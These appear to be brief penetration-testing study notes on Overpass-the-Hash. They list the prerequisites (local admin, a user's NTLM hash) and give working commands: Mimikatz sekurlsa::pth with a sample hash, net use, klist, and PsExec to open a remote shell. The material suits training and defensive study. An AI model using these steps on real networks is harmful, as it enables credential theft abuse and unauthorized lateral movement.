- Use NTLM user hash to gain full Kebreros Ticket Grantin Ticket (TGT), and then obtain Ticket Granting Service (TGS)
- Allows to pass NTLM hash to run services that requires Kerberos instead
- Requires:
- Local admin privileges
- NTLM hash of user
Overpass-the-Hash Remote Shell using Mimikatz:
- Run Mimikatz and enable debug.
- Create TGT:
sekurlsa::pth /user:<targetuser> /domain:<domain> /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
- Obtain ticket by authenticating to network share:
net use \\files04
- Analyze ticket:
klist
- Run PsExec and launch cmd using ticket:
.\PsExec.exe \\files04 cmd